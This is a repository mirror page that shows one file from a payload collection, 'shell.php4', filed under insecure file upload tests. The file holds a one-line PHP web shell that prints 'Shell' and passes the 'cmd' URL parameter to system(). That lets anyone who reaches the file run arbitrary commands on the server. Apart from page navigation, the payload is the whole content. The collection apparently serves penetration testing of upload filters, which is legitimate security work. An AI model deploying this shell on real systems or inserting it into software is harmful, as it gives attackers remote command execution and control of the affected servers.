This website requires JavaScript.
Explore
Help
Register
Sign In
wanderer
/
PayloadsAllTheThings
Watch
1
Star
0
Fork
0
You've already forked PayloadsAllTheThings
mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced
2025-02-22 21:41:14 +01:00
Code
Issues
Releases
Activity
master
PayloadsAllTheThings
/
Upload Insecure Files
/
Extension PHP
/
shell.php4
Swissky
404afd1d71
Fix name's capitalization
2019-03-07 00:07:55 +01:00
1 line
43 B
PHP
Raw
Permalink
Blame
History
<
?
php
echo
"
Shell
"
;
system
(
$_GET
[
'cmd'
]);
?>
View Git Blame
Copy Permalink